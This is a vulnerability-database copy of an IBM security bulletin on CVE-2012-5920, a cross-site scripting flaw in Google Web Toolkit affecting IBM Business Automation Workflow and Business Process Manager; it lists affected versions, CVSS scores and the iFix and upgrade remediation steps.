Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
ibmIBMD9514E23EB8E2C4D6FCAE5738D5E3D117CB2EC8F5B66C9740234D29E5FE636A3
HistoryJan 14, 2021 - 9:22 p.m.

Security Bulletin: Cross Site Scripting vulnerability in Google Web Toolkit may affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) - CVE-2012-5920

2021-01-1421:22:30
www.ibm.com
11

0.003 Low

EPSS

Percentile

65.5%

JSON

Summary

IBM Business Process Manager and IBM Business Automation Workflow may be vulnerable to a cross site scripting attack.

Vulnerability Details

CVEID:CVE-2012-5920
**DESCRIPTION:**Google Web Toolkit is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victimโ€™s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victimโ€™s cookie-based authentication credentials. Note: This vulnerability is due to an incomplete fix for CVE-2012-4563.
CVSS Base score: 4.3
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/80331 for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Affected Products and Versions

Affected Product(s) Version(s)
IBM Business Automation Workflow V20.0.0.1,
V19.0,
V18.0

V20.0.0.2 is NOT affected
IBM Business Process Manager| V8.6, V8.5

For earlier and unsupported versions of the products, IBM recommends upgrading to a fixed, supported version of the product.

Remediation/Fixes

The recommended solution is to apply the Interim Fix (iFix) or Cumulative Fix (CF) containing APAR JR62790 as soon as practical:

For IBM Business Automation Workflow V18.0, V19.0, and V20.0
ยท Upgrade to minimal cumulative fix levels as required by iFix and then apply iFix JR62790
--ORโ€“
ยท Apply cumulative fix Business Automation Workflow V20.0.0.2 or later

For IBM Business Process Manager V8.6
ยท Upgrade to minimal cumulative fix levels as required by iFix and then apply iFix JR62790
--ORโ€“
ยท Upgrade to Business Automation Workflow V20.0.0.2 or later

For IBM BPM V8.5
ยท Upgrade to IBM BPM V8.5.7, apply Cumulative Fix 2017.06 and then apply iFix JR62790
--ORโ€“
ยท Upgrade to Business Automation Workflow V20.0.0.2 or later

Workarounds and Mitigations

None

Related

ubuntucve 1
prion 2
cvelist 2
cve 2
nvd 2
veracode 1
ubuntucve
ubuntucve
CVE-2012-4563
2012-11-20 00:00:00
prion
prion
Cross site scripting
2012-11-20 00:55:00
Cross site scripting
2012-11-20 00:55:00
cvelist
cvelist
CVE-2012-5920
2012-11-20 00:00:00
CVE-2012-4563
2012-11-20 00:00:00
cve
cve
CVE-2012-5920
2012-11-20 00:55:01
CVE-2012-4563
2012-11-20 00:55:01
nvd
nvd
CVE-2012-5920
2012-11-20 00:55:01
CVE-2012-4563
2012-11-20 00:55:01
veracode
veracode
Cross-site Scripting (XSS)
2018-11-07 10:12:42

0.003 Low

EPSS

Percentile

65.5%

JSON
Related for D9514E23EB8E2C4D6FCAE5738D5E3D117CB2EC8F5B66C9740234D29E5FE636A3
ubuntucve1prion2cvelist2cve2nvd2veracode1